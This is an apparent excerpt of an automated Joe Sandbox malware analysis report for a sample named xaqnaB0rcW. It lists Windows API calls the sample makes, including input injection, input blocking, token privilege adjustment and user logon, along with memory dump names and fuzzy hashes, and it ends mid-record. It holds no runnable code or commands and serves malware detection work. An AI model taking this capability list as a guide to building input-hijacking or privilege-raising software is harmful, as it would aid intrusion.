                                                                  • Opcode Fuzzy Hash: c91ed5c87b287b8b888c3495c021ebfd91798691e55c6b775a6cb6ae66e4cfd7
                                                                  • Instruction Fuzzy Hash: 481184726146009FDB11EF28D845A2EB7E9FF85325F01891EF8A5DB2A1DB30AD058B85
                                                                  APIs
                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,003ABE6A,?,?,00000000,?), ref: 0039CEA7
                                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,003ABE6A,?,?,00000000,?), ref: 0039CEB9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFormatLastMessage
                                                                  • String ID:
                                                                  • API String ID: 3479602957-0
                                                                  • Opcode ID: c5ec367301cdcd37dcc948c26950be8feb36d9912717794beb2cbc74fb9c188f
                                                                  • Instruction ID: d0c1d3dbc98670afbb984565c16128b47936ad4a758f62ef7720a7ca4c5aa6a1
                                                                  • Opcode Fuzzy Hash: c5ec367301cdcd37dcc948c26950be8feb36d9912717794beb2cbc74fb9c188f
                                                                  • Instruction Fuzzy Hash: F0F0E231411229BBDB229BA0DC49FEA736CBF08352F008126F819D6080C7309A04CBA0
                                                                  APIs
                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00394153
                                                                  • keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 00394166
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: InputSendkeybd_event
                                                                  • String ID:
                                                                  • API String ID: 3536248340-0
                                                                  • Opcode ID: a588acccdbfce34a45b81db43ee9884d9848c63b706b73f16b67bb5a9294cd18
                                                                  • Instruction ID: ca0f04aa0ed5ed6395a63a8c04549a3c72216af7d06014f600d84c1051c4e51a
                                                                  • Opcode Fuzzy Hash: a588acccdbfce34a45b81db43ee9884d9848c63b706b73f16b67bb5a9294cd18
                                                                  • Instruction Fuzzy Hash: 4CF0677080024DAFDF069FA0D805BBE7BB8EF00305F00800AF966A6292D77986129FA0
                                                                  APIs
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0038ACC0), ref: 0038AB99
                                                                  • CloseHandle.KERNEL32(?,?,0038ACC0), ref: 0038ABAB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                  • String ID:
                                                                  • API String ID: 81990902-0
                                                                  • Opcode ID: ef9aa3edf3520ff9c0d6ff540ec25b947d9be07e4340b4309be51713632c82e4
                                                                  • Instruction ID: 5af8b9888264d75aecc456e403c3b0fff896227e26a6c744a137145727154298
                                                                  • Opcode Fuzzy Hash: ef9aa3edf3520ff9c0d6ff540ec25b947d9be07e4340b4309be51713632c82e4
                                                                  • Instruction Fuzzy Hash: 76E0E675001610AFE7272F54FC05D777BEDEF04320B20C46AF59A85474D762AC90DB50
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00376DB3,-0000031A,?,?,00000001), ref: 003781B1
                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 003781BA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: c6239d7fdc19215e7dc32669b8319965f9ad47b7be0195398f02a5cde3dae656
                                                                  • Instruction ID: 38a8b4ebb6fc2ffd8282e39b275ec72c3c0231f27c4626959ecd7299147a39e2
                                                                  • Opcode Fuzzy Hash: c6239d7fdc19215e7dc32669b8319965f9ad47b7be0195398f02a5cde3dae656
                                                                  • Instruction Fuzzy Hash: 42B09235085608BBDB022BA5FC09B587F6CEB08752F004012F60D440618B7254108A92
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharUpper
                                                                  • String ID: A
                                                                  • API String ID: 3964851224-1886306616
                                                                  • Opcode ID: 83ea569f9fbb1a46e58cc61eccf5b5c8c2a95dd5a097806ef9a29f0494279d94
                                                                  • Instruction ID: 7454ec0535e4fbbe570f9f24c4b50f1df4423f11b5bc6f5cd79b48adc0b4fab0
                                                                  • Opcode Fuzzy Hash: 83ea569f9fbb1a46e58cc61eccf5b5c8c2a95dd5a097806ef9a29f0494279d94
                                                                  • Instruction Fuzzy Hash: 71929A706083418FD726DF18C484F6ABBE4BF89304F15885DE98A8B3A6D771ED45CB52
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e56dfbdcddbee31f33a45ed37a33d849689b2293c6d5d00229e7c6157d36642f
                                                                  • Instruction ID: 045ae7b19f868776c789e15ff0ca8aa7df7e7ea9f45d92a49c3b2f3242ff0e4a
                                                                  • Opcode Fuzzy Hash: e56dfbdcddbee31f33a45ed37a33d849689b2293c6d5d00229e7c6157d36642f
                                                                  • Instruction Fuzzy Hash: FA32F522D29F414DD7339634D862336A29DAFB73D4F15D727E81EB9DAAEB29C4834100
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: __itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 674341424-0
                                                                  • Opcode ID: be97c45f36f32611951b70aa18dcc8028ba86ef403be6a09c0d69381aae357bd
                                                                  • Instruction ID: bc713dcb22c2e9643eaea8d4535b31d35959524f48bdc5326e3faa4591ab2ed1
                                                                  • Opcode Fuzzy Hash: be97c45f36f32611951b70aa18dcc8028ba86ef403be6a09c0d69381aae357bd
                                                                  • Instruction Fuzzy Hash: CB228771618300DFD726DF24C891F6BB7E4AF84300F11491EF89A9B2A1DB71E948CB92
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 20fefb13223964ff304aad48f6b0bd344a13907a7a9ac49411fe9e118ac94897
                                                                  • Instruction ID: ab3174704ce04cc5191d2a435b237304a62a456dd8fbc52cfdde5d0ac1c88732
                                                                  • Opcode Fuzzy Hash: 20fefb13223964ff304aad48f6b0bd344a13907a7a9ac49411fe9e118ac94897
                                                                  • Instruction Fuzzy Hash: 3CB1D320D2AF814DD76396398871336B65CAFBB3D9F91D71BFC1A78D62EB2185834180
                                                                  APIs
                                                                  • __time64.LIBCMT ref: 0039B6DF
                                                                    • Part of subcall function 0037344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0039BDC3,00000000,?,?,?,?,0039BF70,00000000,?), ref: 00373453
                                                                    • Part of subcall function 0037344A: __aulldiv.LIBCMT ref: 00373473
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Time$FileSystem__aulldiv__time64
                                                                  • String ID:
                                                                  • API String ID: 2893107130-0
                                                                  • Opcode ID: ab409af9463748e952da8041f85f032fbfb811cc54118e07155b106264b1ef66
                                                                  • Instruction ID: 518297eb9d93991e12288999b2fa159251249d97c36c962a6b7ad829c3222344
                                                                  • Opcode Fuzzy Hash: ab409af9463748e952da8041f85f032fbfb811cc54118e07155b106264b1ef66
                                                                  • Instruction Fuzzy Hash: 5E2160726345108BC72ACF28D481A92F7E1EB95311B248E7DE4E5CB280CB74B905DB58
                                                                  APIs
                                                                  • BlockInput.USER32(00000001), ref: 003A6ACA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: BlockInput
                                                                  • String ID:
                                                                  • API String ID: 3456056419-0
                                                                  • Opcode ID: 84faaa339644bfde736743c4058dcb57f7126eeeb60cc0de981463ed02d20250
                                                                  • Instruction ID: a19d6682051beb71e74256c293b1f63a752e0a871b3d996053081f18edc61417
                                                                  • Opcode Fuzzy Hash: 84faaa339644bfde736743c4058dcb57f7126eeeb60cc0de981463ed02d20250
                                                                  • Instruction Fuzzy Hash: ADE048752002046FC741EF9DD405D56B7ECEF75751F05C416F945D7261DAB0F8048B90
                                                                  APIs
                                                                  • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 003974DE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: mouse_event
                                                                  • String ID:
                                                                  • API String ID: 2434400541-0
                                                                  • Opcode ID: deca24b48bcf4a85095ee2ec789130695c9fdebedda6c6d6fca122b82a2e3d78
                                                                  • Instruction ID: 244cdb365a0bfd4afb255b66084467a1d5e85ad36322c85966adb95b9135c8c4
                                                                  • Opcode Fuzzy Hash: deca24b48bcf4a85095ee2ec789130695c9fdebedda6c6d6fca122b82a2e3d78
                                                                  • Instruction Fuzzy Hash: 5CD09EA667C70579ED2B07269C1FF761A0DF3017C1F969289B582CD4C3B99078459132
                                                                  APIs
                                                                  • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0038AD3E), ref: 0038B124
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: LogonUser
                                                                  • String ID:
                                                                  • API String ID: 1244722697-0
                                                                  • Opcode ID: 34006bd66332179321ce2b1b64c8fd79d711d7c6a2152f30e211dca2bd47cfd8
                                                                  • Instruction ID: 3cf46256a0767a3b9c6fa4bc3247738784b9461fcabb88d8e55966917f9405a2
                                                                  • Opcode Fuzzy Hash: 34006bd66332179321ce2b1b64c8fd79d711d7c6a2152f30e211dca2bd47cfd8
                                                                  • Instruction Fuzzy Hash: E9D09E321A464EAFDF025FA4EC06EAE3F6AEB05701F448511FA15D50A1C675D531AB50
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: NameUser
                                                                  • String ID:
                                                                  • API String ID: 2645101109-0
                                                                  • Opcode ID: f95ee2b970eee87fe3c5cb2c2e490aa2bc863884b832da43988b4f1036dfd795
                                                                  • Instruction ID: de7740fcb1a3f75d05f0f8f55d8125748355e6fc70913e28a0dc2148384ef4e5
                                                                  • Opcode Fuzzy Hash: f95ee2b970eee87fe3c5cb2c2e490aa2bc863884b832da43988b4f1036dfd795
                                                                  • Instruction Fuzzy Hash: 23C04CB140150DDFC752CBC0DD44EEEB7BCAB04705F1040969105F1110D7709B459B72
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0037818F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: 9c11333128bc68ac27d8cfab8f0ea77f76d8dd07a9e748164b30fa2be44836cd
                                                                  • Instruction ID: c5bb2d18a640492725e4cb1211350b2c87c09cebb443b28aa84d452503224b90
                                                                  • Opcode Fuzzy Hash: 9c11333128bc68ac27d8cfab8f0ea77f76d8dd07a9e748164b30fa2be44836cd
                                                                  • Instruction Fuzzy Hash: ECA0113008020CAB8F022B82FC088883F2CEA002A0B000022F80C000208B22A8208A82
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 070663177abf7b00af230f7fd91e1d679f3e4ac4164aed74a07c20baf2897507
                                                                  • Instruction ID: 079398661a737bb1e637a97e82cd80a58a9aa601d64c02831b232cdc08082be8
                                                                  • Opcode Fuzzy Hash: 070663177abf7b00af230f7fd91e1d679f3e4ac4164aed74a07c20baf2897507
                                                                  • Instruction Fuzzy Hash: ED128E70A00209DFDF06DFA5D985AAEB7F5FF48301F108529E806E7265EB35AD28CB54
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 12e9e6a9eb4164f20a609992a8480221826bcf33df6285787212f65eb7ee24cc
                                                                  • Instruction ID: 328a2786b9058849f49f4c13d6924020576ff52e4165bac151f33b5a08537c35
                                                                  • Opcode Fuzzy Hash: 12e9e6a9eb4164f20a609992a8480221826bcf33df6285787212f65eb7ee24cc
                                                                  • Instruction Fuzzy Hash: 3612BE75904205CFDB2ADF54C480FAAB7B0FF18305F158069ED5AAB361E731AE89CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Exception@8Throwstd::exception::exception
                                                                  • String ID:
                                                                  • API String ID: 3728558374-0
                                                                  • Opcode ID: 2cbb36536e3b3f3527a5a099dc1182a7ad8bee7bc695cf7f2f9070eea2324fda
                                                                  • Instruction ID: feca25bc4ab47fa0de5463c976b37b62bce27b23a4d9fd9619f52f316d1ec3dd
                                                                  • Opcode Fuzzy Hash: 2cbb36536e3b3f3527a5a099dc1182a7ad8bee7bc695cf7f2f9070eea2324fda
                                                                  • Instruction Fuzzy Hash: E7029070A00205DFDF16DF68D991AAFB7B5EF44300F118469E806EB2A5EB31DE15CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                  • Instruction ID: f2276c5df9f62bc108d9688ad2f4e54d2e9848ced076ee3152a4594823208992
                                                                  • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                  • Instruction Fuzzy Hash: 24C1C1322091934EDB2F463A843443EBEA15BA27B131B876DD8B6CB5D5EF24C534D620
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                  • Instruction ID: 2549a941642334b3741fd4d0e96ea50a7b47ac0053551ecf8c22f5177ca7b93c
                                                                  • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                  • Instruction Fuzzy Hash: F0C1CF322051938EDF6E463AC43443EBEA15BA2BB131B876DD4B6CB4D9EF24D534D620
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
